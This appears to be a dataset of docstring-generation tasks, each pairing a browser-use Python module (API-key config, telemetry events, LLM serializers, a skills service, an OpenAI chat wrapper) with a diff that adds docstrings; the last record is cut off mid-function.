class TokenCostCalculated(BaseModel):
+ """Token cost"""
new_prompt_tokens: int
new_prompt_cost: float
@@ -45,6 +47,7 @@
class ModelPricing(BaseModel):
+ """Pricing information for a model"""
model: str
input_cost_per_token: float | None
@@ -59,12 +62,14 @@
class CachedPricingData(BaseModel):
+ """Cached pricing data with timestamp"""
timestamp: datetime
data: dict[str, Any]
class ModelUsageStats(BaseModel):
+ """Usage statistics for a single model"""
model: str
prompt_tokens: int = 0
@@ -76,6 +81,7 @@
class ModelUsageTokens(BaseModel):
+ """Usage tokens for a single model"""
model: str
prompt_tokens: int
@@ -85,6 +91,7 @@
class UsageSummary(BaseModel):
+ """Summary of token usage and costs"""
total_prompt_tokens: int
total_prompt_cost: float
@@ -98,4 +105,4 @@ total_cost: float
entry_count: int
- by_model: dict[str, ModelUsageStats] = Field(default_factory=dict)+ by_model: dict[str, ModelUsageStats] = Field(default_factory=dict)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tokens/views.py |
Generate consistent docstrings |
import json
import os
import sys
from pathlib import Path
class APIKeyRequired(Exception):
pass
def get_config_path() -> Path:
if sys.platform == 'win32':
base = Path(os.environ.get('APPDATA', Path.home()))
else:
base = Path(os.environ.get('XDG_CONFIG_HOME', Path.home() / '.config'))
return base / 'browser-use' / 'config.json'
def require_api_key(feature: str = 'this feature') -> str:
# 1. Check environment
key = os.environ.get('BROWSER_USE_API_KEY')
if key:
return key
# 2. Check config file
config_path = get_config_path()
if config_path.exists():
try:
config = json.loads(config_path.read_text())
if key := config.get('api_key'):
return key
except Exception:
pass
# 3. Interactive prompt (if TTY)
if sys.stdin.isatty() and sys.stdout.isatty():
return prompt_for_api_key(feature)
# 4. Error with helpful message
raise APIKeyRequired(
f"""
╭─────────────────────────────────────────────────────────────╮
│ 🔑 Browser-Use API Key Required │
│ │
│ {feature} requires an API key. │
│ │
│ Get yours at: https://browser-use.com/new-api-key │
│ │
│ Then set it via: │
│ export BROWSER_USE_API_KEY=your_key_here │
│ │
│ Or add to {config_path}: │
│ {{"api_key": "your_key_here"}} │
╰─────────────────────────────────────────────────────────────╯
"""
)
def prompt_for_api_key(feature: str) -> str:
print(
f"""
╭─────────────────────────────────────────────────────────────╮
│ 🔑 Browser-Use API Key Required │
│ │
│ {feature} requires an API key. │
│ Get yours at: https://browser-use.com/new-api-key │
╰─────────────────────────────────────────────────────────────╯
"""
)
try:
key = input('Enter API key: ').strip()
except (EOFError, KeyboardInterrupt):
raise APIKeyRequired('No API key provided')
if not key:
raise APIKeyRequired('No API key provided')
try:
save = input('Save to config? [y/N]: ').strip().lower()
if save == 'y':
save_api_key(key)
except (EOFError, KeyboardInterrupt):
pass
return key
def save_api_key(key: str) -> None:
config_path = get_config_path()
config_path.parent.mkdir(parents=True, exist_ok=True)
config: dict = {}
if config_path.exists():
try:
config = json.loads(config_path.read_text())
except Exception:
pass
config['api_key'] = key
config_path.write_text(json.dumps(config, indent=2))
# Restrict permissions to owner only (0600)
config_path.chmod(0o600)
print(f'Saved to {config_path}')
def get_api_key() -> str | None:
try:
return require_api_key('API key check')
except APIKeyRequired:
return None
def check_api_key() -> dict[str, bool | str | None]:
# Check environment
key = os.environ.get('BROWSER_USE_API_KEY')
if key:
return {
'available': True,
'source': 'env',
'key_prefix': key[:8] if len(key) >= 8 else key,
}
# Check config file
config_path = get_config_path()
if config_path.exists():
try:
config = json.loads(config_path.read_text())
if key := config.get('api_key'):
return {
'available': True,
'source': 'config',
'key_prefix': key[:8] if len(key) >= 8 else key,
}
except Exception:
pass
# Not available
return {
'available': False,
'source': None,
'key_prefix': None,
} | --- +++ @@ -1,3 +1,4 @@+"""API key management for browser-use CLI."""
import json
import os
@@ -6,11 +7,13 @@
class APIKeyRequired(Exception):
+ """Raised when API key is required but not provided."""
pass
def get_config_path() -> Path:
+ """Get browser-use config file path."""
if sys.platform == 'win32':
base = Path(os.environ.get('APPDATA', Path.home()))
else:
@@ -19,6 +22,14 @@
def require_api_key(feature: str = 'this feature') -> str:
+ """Get API key or raise helpful error.
+
+ Checks in order:
+ 1. BROWSER_USE_API_KEY environment variable
+ 2. Config file (~/.config/browser-use/config.json)
+ 3. Interactive prompt (if TTY)
+ 4. Raises APIKeyRequired with helpful message
+ """
# 1. Check environment
key = os.environ.get('BROWSER_USE_API_KEY')
if key:
@@ -59,6 +70,7 @@
def prompt_for_api_key(feature: str) -> str:
+ """Interactive prompt for API key."""
print(
f"""
╭─────────────────────────────────────────────────────────────╮
@@ -89,6 +101,7 @@
def save_api_key(key: str) -> None:
+ """Save API key to config file."""
config_path = get_config_path()
config_path.parent.mkdir(parents=True, exist_ok=True)
@@ -107,6 +120,7 @@
def get_api_key() -> str | None:
+ """Get API key if available, without raising error."""
try:
return require_api_key('API key check')
except APIKeyRequired:
@@ -114,6 +128,14 @@
def check_api_key() -> dict[str, bool | str | None]:
+ """Check API key availability without interactive prompts.
+
+ Returns:
+ Dict with keys:
+ - 'available': bool - whether API key is configured
+ - 'source': str | None - where it came from ('env', 'config', or None)
+ - 'key_prefix': str | None - first 8 chars of key (for display)
+ """
# Check environment
key = os.environ.get('BROWSER_USE_API_KEY')
if key:
@@ -142,4 +164,4 @@ 'available': False,
'source': None,
'key_prefix': None,
- }+ }
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/api_key.py |
Generate missing documentation strings | from abc import ABC, abstractmethod
from collections.abc import Sequence
from dataclasses import asdict, dataclass
from typing import Any, Literal
from browser_use.config import is_running_in_docker
@dataclass
class BaseTelemetryEvent(ABC):
@property
@abstractmethod
def name(self) -> str:
pass
@property
def properties(self) -> dict[str, Any]:
props = {k: v for k, v in asdict(self).items() if k != 'name'}
# Add Docker context if running in Docker
props['is_docker'] = is_running_in_docker()
return props
@dataclass
class AgentTelemetryEvent(BaseTelemetryEvent):
# start details
task: str
model: str
model_provider: str
max_steps: int
max_actions_per_step: int
use_vision: bool | Literal['auto']
version: str
source: str
cdp_url: str | None
agent_type: str | None # 'code' for CodeAgent, None for regular Agent
# step details
action_errors: Sequence[str | None]
action_history: Sequence[list[dict] | None]
urls_visited: Sequence[str | None]
# end details
steps: int
total_input_tokens: int
total_output_tokens: int
prompt_cached_tokens: int
total_tokens: int
total_duration_seconds: float
success: bool | None
final_result_response: str | None
error_message: str | None
# judge details
judge_verdict: bool | None = None
judge_reasoning: str | None = None
judge_failure_reason: str | None = None
judge_reached_captcha: bool | None = None
judge_impossible_task: bool | None = None
name: str = 'agent_event'
@dataclass
class MCPClientTelemetryEvent(BaseTelemetryEvent):
server_name: str
command: str
tools_discovered: int
version: str
action: str # 'connect', 'disconnect', 'tool_call'
tool_name: str | None = None
duration_seconds: float | None = None
error_message: str | None = None
name: str = 'mcp_client_event'
@dataclass
class MCPServerTelemetryEvent(BaseTelemetryEvent):
version: str
action: str # 'start', 'stop', 'tool_call'
tool_name: str | None = None
duration_seconds: float | None = None
error_message: str | None = None
parent_process_cmdline: str | None = None
name: str = 'mcp_server_event'
@dataclass
class CLITelemetryEvent(BaseTelemetryEvent):
version: str
action: str # 'start', 'message_sent', 'task_completed', 'error'
mode: str # 'interactive', 'oneshot', 'mcp_server'
model: str | None = None
model_provider: str | None = None
duration_seconds: float | None = None
error_message: str | None = None
name: str = 'cli_event' | --- +++ @@ -60,6 +60,7 @@
@dataclass
class MCPClientTelemetryEvent(BaseTelemetryEvent):
+ """Telemetry event for MCP client usage"""
server_name: str
command: str
@@ -75,6 +76,7 @@
@dataclass
class MCPServerTelemetryEvent(BaseTelemetryEvent):
+ """Telemetry event for MCP server usage"""
version: str
action: str # 'start', 'stop', 'tool_call'
@@ -88,6 +90,7 @@
@dataclass
class CLITelemetryEvent(BaseTelemetryEvent):
+ """Telemetry event for CLI usage"""
version: str
action: str # 'start', 'message_sent', 'task_completed', 'error'
@@ -97,4 +100,4 @@ duration_seconds: float | None = None
error_message: str | None = None
- name: str = 'cli_event'+ name: str = 'cli_event'
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/telemetry/views.py |
Write docstrings describing functionality | import base64
import json
from typing import Any, overload
from ollama._types import Image, Message
from browser_use.llm.messages import (
AssistantMessage,
BaseMessage,
SystemMessage,
ToolCall,
UserMessage,
)
class OllamaMessageSerializer:
@staticmethod
def _extract_text_content(content: Any) -> str:
if content is None:
return ''
if isinstance(content, str):
return content
text_parts: list[str] = []
for part in content:
if hasattr(part, 'type'):
if part.type == 'text':
text_parts.append(part.text)
elif part.type == 'refusal':
text_parts.append(f'[Refusal] {part.refusal}')
# Skip image parts as they're handled separately
return '\n'.join(text_parts)
@staticmethod
def _extract_images(content: Any) -> list[Image]:
if content is None or isinstance(content, str):
return []
images: list[Image] = []
for part in content:
if hasattr(part, 'type') and part.type == 'image_url':
url = part.image_url.url
if url.startswith('data:'):
# Handle base64 encoded images
# Format: data:image/jpeg;base64,<data>
_, data = url.split(',', 1)
# Decode base64 to bytes
image_bytes = base64.b64decode(data)
images.append(Image(value=image_bytes))
else:
# Handle URL images (Ollama will download them)
images.append(Image(value=url))
return images
@staticmethod
def _serialize_tool_calls(tool_calls: list[ToolCall]) -> list[Message.ToolCall]:
ollama_tool_calls: list[Message.ToolCall] = []
for tool_call in tool_calls:
# Parse arguments from JSON string to dict for Ollama
try:
arguments_dict = json.loads(tool_call.function.arguments)
except json.JSONDecodeError:
# If parsing fails, wrap in a dict
arguments_dict = {'arguments': tool_call.function.arguments}
ollama_tool_call = Message.ToolCall(
function=Message.ToolCall.Function(name=tool_call.function.name, arguments=arguments_dict)
)
ollama_tool_calls.append(ollama_tool_call)
return ollama_tool_calls
# region - Serialize overloads
@overload
@staticmethod
def serialize(message: UserMessage) -> Message: ...
@overload
@staticmethod
def serialize(message: SystemMessage) -> Message: ...
@overload
@staticmethod
def serialize(message: AssistantMessage) -> Message: ...
@staticmethod
def serialize(message: BaseMessage) -> Message:
if isinstance(message, UserMessage):
text_content = OllamaMessageSerializer._extract_text_content(message.content)
images = OllamaMessageSerializer._extract_images(message.content)
ollama_message = Message(
role='user',
content=text_content if text_content else None,
)
if images:
ollama_message.images = images
return ollama_message
elif isinstance(message, SystemMessage):
text_content = OllamaMessageSerializer._extract_text_content(message.content)
return Message(
role='system',
content=text_content if text_content else None,
)
elif isinstance(message, AssistantMessage):
# Handle content
text_content = None
if message.content is not None:
text_content = OllamaMessageSerializer._extract_text_content(message.content)
ollama_message = Message(
role='assistant',
content=text_content if text_content else None,
)
# Handle tool calls
if message.tool_calls:
ollama_message.tool_calls = OllamaMessageSerializer._serialize_tool_calls(message.tool_calls)
return ollama_message
else:
raise ValueError(f'Unknown message type: {type(message)}')
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[Message]:
return [OllamaMessageSerializer.serialize(m) for m in messages] | --- +++ @@ -14,9 +14,11 @@
class OllamaMessageSerializer:
+ """Serializer for converting between custom message types and Ollama message types."""
@staticmethod
def _extract_text_content(content: Any) -> str:
+ """Extract text content from message content, ignoring images."""
if content is None:
return ''
if isinstance(content, str):
@@ -35,6 +37,7 @@
@staticmethod
def _extract_images(content: Any) -> list[Image]:
+ """Extract images from message content."""
if content is None or isinstance(content, str):
return []
@@ -57,6 +60,7 @@
@staticmethod
def _serialize_tool_calls(tool_calls: list[ToolCall]) -> list[Message.ToolCall]:
+ """Convert browser-use ToolCalls to Ollama ToolCalls."""
ollama_tool_calls: list[Message.ToolCall] = []
for tool_call in tool_calls:
@@ -89,6 +93,7 @@
@staticmethod
def serialize(message: BaseMessage) -> Message:
+ """Serialize a custom message to an Ollama Message."""
if isinstance(message, UserMessage):
text_content = OllamaMessageSerializer._extract_text_content(message.content)
@@ -134,4 +139,5 @@
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[Message]:
- return [OllamaMessageSerializer.serialize(m) for m in messages]+ """Serialize a list of browser_use messages to Ollama Messages."""
+ return [OllamaMessageSerializer.serialize(m) for m in messages]
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/ollama/serializer.py |
Create docstrings for reusable components |
import logging
import os
from typing import Any, Literal
from browser_use_sdk import AsyncBrowserUse
from browser_use_sdk.types.execute_skill_response import ExecuteSkillResponse
from browser_use_sdk.types.skill_list_response import SkillListResponse
from cdp_use.cdp.network import Cookie
from pydantic import BaseModel, ValidationError
from browser_use.skills.views import (
MissingCookieException,
Skill,
)
logger = logging.getLogger(__name__)
class SkillService:
def __init__(self, skill_ids: list[str | Literal['*']], api_key: str | None = None):
self.skill_ids = skill_ids
self.api_key = api_key or os.getenv('BROWSER_USE_API_KEY') or ''
if not self.api_key:
raise ValueError('BROWSER_USE_API_KEY environment variable is not set')
self._skills: dict[str, Skill] = {}
self._client: AsyncBrowserUse | None = None
self._initialized = False
async def async_init(self) -> None:
if self._initialized:
logger.debug('SkillService already initialized')
return
# Create the SDK client
self._client = AsyncBrowserUse(api_key=self.api_key)
try:
# Fetch skills from API
logger.info('Fetching skills from Browser Use API...')
use_wildcard = '*' in self.skill_ids
page_size = 100
requested_ids: set[str] = set() if use_wildcard else {s for s in self.skill_ids if s != '*'}
if use_wildcard:
# Wildcard: fetch only first page (max 100 skills) to avoid LLM tool overload
skills_response: SkillListResponse = await self._client.skills.list_skills(
page_size=page_size,
page_number=1,
is_enabled=True,
)
all_items = list(skills_response.items)
if len(all_items) >= page_size:
logger.warning(
f'Wildcard "*" limited to first {page_size} skills. '
f'Specify explicit skill IDs if you need specific skills beyond this limit.'
)
logger.debug(f'Fetched {len(all_items)} skills (wildcard mode, single page)')
else:
# Explicit IDs: paginate until all requested IDs found
all_items = []
page = 1
max_pages = 5 # Safety limit
while page <= max_pages:
skills_response = await self._client.skills.list_skills(
page_size=page_size,
page_number=page,
is_enabled=True,
)
all_items.extend(skills_response.items)
# Check if we've found all requested skills
found_ids = {s.id for s in all_items if s.id in requested_ids}
if found_ids == requested_ids:
break
# Stop if we got fewer items than page_size (last page)
if len(skills_response.items) < page_size:
break
page += 1
if page > max_pages:
logger.warning(f'Reached pagination limit ({max_pages} pages) before finding all requested skills')
logger.debug(f'Fetched {len(all_items)} skills across {page} page(s)')
# Filter to only finished skills (is_enabled already filtered by API)
all_available_skills = [skill for skill in all_items if skill.status == 'finished']
logger.info(f'Found {len(all_available_skills)} available skills from API')
# Determine which skills to load
if use_wildcard:
logger.info('Wildcard "*" detected, loading first 100 skills')
skills_to_load = all_available_skills
else:
# Load only the requested skill IDs
skills_to_load = [skill for skill in all_available_skills if skill.id in requested_ids]
# Warn about any requested skills that weren't found
found_ids = {skill.id for skill in skills_to_load}
missing_ids = requested_ids - found_ids
if missing_ids:
logger.warning(f'Requested skills not found or not available: {missing_ids}')
# Convert SDK SkillResponse objects to our Skill models and cache them
for skill_response in skills_to_load:
try:
skill = Skill.from_skill_response(skill_response)
self._skills[skill.id] = skill
logger.debug(f'Cached skill: {skill.title} ({skill.id})')
except Exception as e:
logger.error(f'Failed to convert skill {skill_response.id}: {type(e).__name__}: {e}')
logger.info(f'Successfully loaded {len(self._skills)} skills')
self._initialized = True
except Exception as e:
logger.error(f'Error during skill initialization: {type(e).__name__}: {e}')
self._initialized = True # Mark as initialized even on failure to avoid retry loops
raise
async def get_skill(self, skill_id: str) -> Skill | None:
if not self._initialized:
await self.async_init()
return self._skills.get(skill_id)
async def get_all_skills(self) -> list[Skill]:
if not self._initialized:
await self.async_init()
return list(self._skills.values())
async def execute_skill(
self, skill_id: str, parameters: dict[str, Any] | BaseModel, cookies: list[Cookie]
) -> ExecuteSkillResponse:
# Auto-initialize if needed
if not self._initialized:
await self.async_init()
assert self._client is not None, 'Client not initialized'
# Check if skill exists in cache
skill = await self.get_skill(skill_id)
if skill is None:
raise ValueError(f'Skill {skill_id} not found in cache. Available skills: {list(self._skills.keys())}')
# Extract cookie parameters from the skill
cookie_params = [p for p in skill.parameters if p.type == 'cookie']
# Build a dict of cookies from the provided cookie list
cookie_dict: dict[str, str] = {cookie['name']: cookie['value'] for cookie in cookies}
# Check for missing required cookies and fill cookie values
if cookie_params:
for cookie_param in cookie_params:
is_required = cookie_param.required if cookie_param.required is not None else True
if is_required and cookie_param.name not in cookie_dict:
# Required cookie is missing - raise exception with description
raise MissingCookieException(
cookie_name=cookie_param.name, cookie_description=cookie_param.description or 'No description provided'
)
# Fill in cookie values into parameters
# Convert parameters to dict first if it's a BaseModel
if isinstance(parameters, BaseModel):
params_dict = parameters.model_dump()
else:
params_dict = dict(parameters)
# Add cookie values to parameters
for cookie_param in cookie_params:
if cookie_param.name in cookie_dict:
params_dict[cookie_param.name] = cookie_dict[cookie_param.name]
# Replace parameters with the updated dict
parameters = params_dict
# Get the skill's pydantic model for parameter validation
ParameterModel = skill.parameters_pydantic(exclude_cookies=False)
# Validate and convert parameters to dict
validated_params_dict: dict[str, Any]
try:
if isinstance(parameters, BaseModel):
# Already a pydantic model - validate it matches the skill's schema
# by converting to dict and re-validating with the skill's model
params_dict = parameters.model_dump()
validated_model = ParameterModel(**params_dict)
validated_params_dict = validated_model.model_dump()
else:
# Dict provided - validate with the skill's pydantic model
validated_model = ParameterModel(**parameters)
validated_params_dict = validated_model.model_dump()
except ValidationError as e:
# Pydantic validation failed
error_msg = f'Parameter validation failed for skill {skill.title}:\n'
for error in e.errors():
field = '.'.join(str(x) for x in error['loc'])
error_msg += f' - {field}: {error["msg"]}\n'
raise ValueError(error_msg) from e
except Exception as e:
raise ValueError(f'Failed to validate parameters for skill {skill.title}: {type(e).__name__}: {e}') from e
# Execute skill via API
try:
logger.info(f'Executing skill: {skill.title} ({skill_id})')
result: ExecuteSkillResponse = await self._client.skills.execute_skill(
skill_id=skill_id, parameters=validated_params_dict
)
if result.success:
logger.info(f'Skill {skill.title} executed successfully (latency: {result.latency_ms}ms)')
else:
logger.error(f'Skill {skill.title} execution failed: {result.error}')
return result
except Exception as e:
logger.error(f'Error executing skill {skill_id}: {type(e).__name__}: {e}')
# Return error response
return ExecuteSkillResponse(
success=False,
error=f'Failed to execute skill: {type(e).__name__}: {str(e)}',
)
async def close(self) -> None:
if self._client is not None:
# AsyncBrowserUse client cleanup if needed
# The SDK doesn't currently have a close method, but we set to None for cleanup
self._client = None
self._initialized = False | --- +++ @@ -1,3 +1,4 @@+"""Skills service for fetching and executing skills from the Browser Use API"""
import logging
import os
@@ -18,8 +19,15 @@
class SkillService:
+ """Service for managing and executing skills from the Browser Use API"""
def __init__(self, skill_ids: list[str | Literal['*']], api_key: str | None = None):
+ """Initialize the skills service
+
+ Args:
+ skill_ids: List of skill IDs to fetch and cache, or ['*'] to fetch all available skills
+ api_key: Browser Use API key (optional, will use env var if not provided)
+ """
self.skill_ids = skill_ids
self.api_key = api_key or os.getenv('BROWSER_USE_API_KEY') or ''
@@ -31,6 +39,11 @@ self._initialized = False
async def async_init(self) -> None:
+ """Async initialization to fetch all skills at once
+
+ This should be called after __init__ to fetch and cache all skills.
+ Fetches all available skills in one API call and filters based on skill_ids.
+ """
if self._initialized:
logger.debug('SkillService already initialized')
return
@@ -127,12 +140,25 @@ raise
async def get_skill(self, skill_id: str) -> Skill | None:
+ """Get a cached skill by ID. Auto-initializes if not already initialized.
+
+ Args:
+ skill_id: The UUID of the skill
+
+ Returns:
+ Skill model or None if not found in cache
+ """
if not self._initialized:
await self.async_init()
return self._skills.get(skill_id)
async def get_all_skills(self) -> list[Skill]:
+ """Get all cached skills. Auto-initializes if not already initialized.
+
+ Returns:
+ List of all successfully loaded skills
+ """
if not self._initialized:
await self.async_init()
@@ -141,6 +167,21 @@ async def execute_skill(
self, skill_id: str, parameters: dict[str, Any] | BaseModel, cookies: list[Cookie]
) -> ExecuteSkillResponse:
+ """Execute a skill with the provided parameters. Auto-initializes if not already initialized.
+
+ Parameters are validated against the skill's Pydantic schema before execution.
+
+ Args:
+ skill_id: The UUID of the skill to execute
+ parameters: Either a dictionary or BaseModel instance matching the skill's parameter schema
+
+ Returns:
+ ExecuteSkillResponse with execution results
+
+ Raises:
+ ValueError: If skill not found in cache or parameter validation fails
+ Exception: If API call fails
+ """
# Auto-initialize if needed
if not self._initialized:
await self.async_init()
@@ -235,8 +276,9 @@ )
async def close(self) -> None:
+ """Close the SDK client and cleanup resources"""
if self._client is not None:
# AsyncBrowserUse client cleanup if needed
# The SDK doesn't currently have a close method, but we set to None for cleanup
self._client = None
- self._initialized = False+ self._initialized = False
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skills/service.py |
Document this code for team use | from collections.abc import Iterable, Mapping
from dataclasses import dataclass, field
from typing import Any, Literal, TypeVar, overload
import httpx
from openai import APIConnectionError, APIStatusError, AsyncOpenAI, RateLimitError
from openai.types.chat import ChatCompletionContentPartTextParam
from openai.types.chat.chat_completion import ChatCompletion
from openai.types.shared.chat_model import ChatModel
from openai.types.shared_params.reasoning_effort import ReasoningEffort
from openai.types.shared_params.response_format_json_schema import JSONSchema, ResponseFormatJSONSchema
from pydantic import BaseModel
from browser_use.llm.base import BaseChatModel
from browser_use.llm.exceptions import ModelProviderError, ModelRateLimitError
from browser_use.llm.messages import BaseMessage
from browser_use.llm.openai.serializer import OpenAIMessageSerializer
from browser_use.llm.schema import SchemaOptimizer
from browser_use.llm.views import ChatInvokeCompletion, ChatInvokeUsage
T = TypeVar('T', bound=BaseModel)
@dataclass
class ChatOpenAI(BaseChatModel):
# Model configuration
model: ChatModel | str
# Model params
temperature: float | None = 0.2
frequency_penalty: float | None = 0.3 # this avoids infinite generation of \t for models like 4.1-mini
reasoning_effort: ReasoningEffort = 'low'
seed: int | None = None
service_tier: Literal['auto', 'default', 'flex', 'priority', 'scale'] | None = None
top_p: float | None = None
add_schema_to_system_prompt: bool = False # Add JSON schema to system prompt instead of using response_format
dont_force_structured_output: bool = False # If True, the model will not be forced to output a structured output
remove_min_items_from_schema: bool = (
False # If True, remove minItems from JSON schema (for compatibility with some providers)
)
remove_defaults_from_schema: bool = (
False # If True, remove default values from JSON schema (for compatibility with some providers)
)
# Client initialization parameters
api_key: str | None = None
organization: str | None = None
project: str | None = None
base_url: str | httpx.URL | None = None
websocket_base_url: str | httpx.URL | None = None
timeout: float | httpx.Timeout | None = None
max_retries: int = 5 # Increase default retries for automation reliability
default_headers: Mapping[str, str] | None = None
default_query: Mapping[str, object] | None = None
http_client: httpx.AsyncClient | None = None
_strict_response_validation: bool = False
max_completion_tokens: int | None = 4096
reasoning_models: list[ChatModel | str] | None = field(
default_factory=lambda: [
'o4-mini',
'o3',
'o3-mini',
'o1',
'o1-pro',
'o3-pro',
'gpt-5',
'gpt-5-mini',
'gpt-5-nano',
]
)
# Static
@property
def provider(self) -> str:
return 'openai'
def _get_client_params(self) -> dict[str, Any]:
# Define base client params
base_params = {
'api_key': self.api_key,
'organization': self.organization,
'project': self.project,
'base_url': self.base_url,
'websocket_base_url': self.websocket_base_url,
'timeout': self.timeout,
'max_retries': self.max_retries,
'default_headers': self.default_headers,
'default_query': self.default_query,
'_strict_response_validation': self._strict_response_validation,
}
# Create client_params dict with non-None values
client_params = {k: v for k, v in base_params.items() if v is not None}
# Add http_client if provided
if self.http_client is not None:
client_params['http_client'] = self.http_client
return client_params
def get_client(self) -> AsyncOpenAI:
client_params = self._get_client_params()
return AsyncOpenAI(**client_params)
@property
def name(self) -> str:
return str(self.model)
def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
if response.usage is not None:
# Note: completion_tokens already includes reasoning_tokens per OpenAI API docs.
# Unlike Google Gemini where thinking_tokens are reported separately,
# OpenAI's reasoning_tokens are a subset of completion_tokens.
usage = ChatInvokeUsage(
prompt_tokens=response.usage.prompt_tokens,
prompt_cached_tokens=response.usage.prompt_tokens_details.cached_tokens
if response.usage.prompt_tokens_details is not None
else None,
prompt_cache_creation_tokens=None,
prompt_image_tokens=None,
# Completion
completion_tokens=response.usage.completion_tokens,
total_tokens=response.usage.total_tokens,
)
else:
usage = None
return usage
@overload
async def ainvoke(
self, messages: list[BaseMessage], output_format: None = None, **kwargs: Any
) -> ChatInvokeCompletion[str]: ...
@overload
async def ainvoke(self, messages: list[BaseMessage], output_format: type[T], **kwargs: Any) -> ChatInvokeCompletion[T]: ...
async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
openai_messages = OpenAIMessageSerializer.serialize_messages(messages)
try:
model_params: dict[str, Any] = {}
if self.temperature is not None:
model_params['temperature'] = self.temperature
if self.frequency_penalty is not None:
model_params['frequency_penalty'] = self.frequency_penalty
if self.max_completion_tokens is not None:
model_params['max_completion_tokens'] = self.max_completion_tokens
if self.top_p is not None:
model_params['top_p'] = self.top_p
if self.seed is not None:
model_params['seed'] = self.seed
if self.service_tier is not None:
model_params['service_tier'] = self.service_tier
if self.reasoning_models and any(str(m).lower() in str(self.model).lower() for m in self.reasoning_models):
model_params['reasoning_effort'] = self.reasoning_effort
model_params.pop('temperature', None)
model_params.pop('frequency_penalty', None)
if output_format is None:
# Return string response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openai_messages,
**model_params,
)
choice = response.choices[0] if response.choices else None
if choice is None:
base_url = str(self.base_url) if self.base_url is not None else None
hint = f' (base_url={base_url})' if base_url is not None else ''
raise ModelProviderError(
message=(
'Invalid OpenAI chat completion response: missing or empty `choices`.'
' If you are using a proxy via `base_url`, ensure it implements the OpenAI'
' `/v1/chat/completions` schema and returns `choices` as a non-empty list.'
f'{hint}'
),
status_code=502,
model=self.name,
)
usage = self._get_usage(response)
return ChatInvokeCompletion(
completion=choice.message.content or '',
usage=usage,
stop_reason=choice.finish_reason,
)
else:
response_format: JSONSchema = {
'name': 'agent_output',
'strict': True,
'schema': SchemaOptimizer.create_optimized_json_schema(
output_format,
remove_min_items=self.remove_min_items_from_schema,
remove_defaults=self.remove_defaults_from_schema,
),
}
# Add JSON schema to system prompt if requested
if self.add_schema_to_system_prompt and openai_messages and openai_messages[0]['role'] == 'system':
schema_text = f'\n<json_schema>\n{response_format}\n</json_schema>'
if isinstance(openai_messages[0]['content'], str):
openai_messages[0]['content'] += schema_text
elif isinstance(openai_messages[0]['content'], Iterable):
openai_messages[0]['content'] = list(openai_messages[0]['content']) + [
ChatCompletionContentPartTextParam(text=schema_text, type='text')
]
if self.dont_force_structured_output:
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openai_messages,
**model_params,
)
else:
# Return structured response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openai_messages,
response_format=ResponseFormatJSONSchema(json_schema=response_format, type='json_schema'),
**model_params,
)
choice = response.choices[0] if response.choices else None
if choice is None:
base_url = str(self.base_url) if self.base_url is not None else None
hint = f' (base_url={base_url})' if base_url is not None else ''
raise ModelProviderError(
message=(
'Invalid OpenAI chat completion response: missing or empty `choices`.'
' If you are using a proxy via `base_url`, ensure it implements the OpenAI'
' `/v1/chat/completions` schema and returns `choices` as a non-empty list.'
f'{hint}'
),
status_code=502,
model=self.name,
)
if choice.message.content is None:
raise ModelProviderError(
message='Failed to parse structured output from model response',
status_code=500,
model=self.name,
)
usage = self._get_usage(response)
parsed = output_format.model_validate_json(choice.message.content)
return ChatInvokeCompletion(
completion=parsed,
usage=usage,
stop_reason=choice.finish_reason,
)
except ModelProviderError:
# Preserve status_code and message from validation errors
raise
except RateLimitError as e:
raise ModelRateLimitError(message=e.message, model=self.name) from e
except APIConnectionError as e:
raise ModelProviderError(message=str(e), model=self.name) from e
except APIStatusError as e:
raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
raise ModelProviderError(message=str(e), model=self.name) from e | --- +++ @@ -23,6 +23,12 @@
@dataclass
class ChatOpenAI(BaseChatModel):
+ """
+ A wrapper around AsyncOpenAI that implements the BaseLLM protocol.
+
+ This class accepts all AsyncOpenAI parameters while adding model
+ and temperature parameters for the LLM interface (if temperature it not `None`).
+ """
# Model configuration
model: ChatModel | str
@@ -76,6 +82,7 @@ return 'openai'
def _get_client_params(self) -> dict[str, Any]:
+ """Prepare client parameters dictionary."""
# Define base client params
base_params = {
'api_key': self.api_key,
@@ -100,6 +107,12 @@ return client_params
def get_client(self) -> AsyncOpenAI:
+ """
+ Returns an AsyncOpenAI client.
+
+ Returns:
+ AsyncOpenAI: An instance of the AsyncOpenAI client.
+ """
client_params = self._get_client_params()
return AsyncOpenAI(**client_params)
@@ -139,6 +152,16 @@ async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
+ """
+ Invoke the model with the given messages.
+
+ Args:
+ messages: List of chat messages
+ output_format: Optional Pydantic model class for structured output
+
+ Returns:
+ Either a string response or an instance of output_format
+ """
openai_messages = OpenAIMessageSerializer.serialize_messages(messages)
@@ -280,4 +303,4 @@ raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
- raise ModelProviderError(message=str(e), model=self.name) from e+ raise ModelProviderError(message=str(e), model=self.name) from e
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/openai/chat.py |
Add professional docstrings to my codebase |
import asyncio
import logging
from pathlib import Path
from typing import Any
from browser_use.skill_cli.sessions import SessionInfo
logger = logging.getLogger(__name__)
async def handle(session: SessionInfo, params: dict[str, Any]) -> Any:
python_session = session.python_session
browser_session = session.browser_session
# Handle --reset
if params.get('reset'):
python_session.reset()
return {'reset': True, 'message': 'Python namespace cleared'}
# Handle --vars
if params.get('vars'):
variables = python_session.get_variables()
return {'variables': variables, 'count': len(variables)}
# Get code to execute
code = params.get('code')
# Handle --file
if params.get('file'):
file_path = Path(params['file'])
if not file_path.exists():
return {'success': False, 'error': f'File not found: {file_path}'}
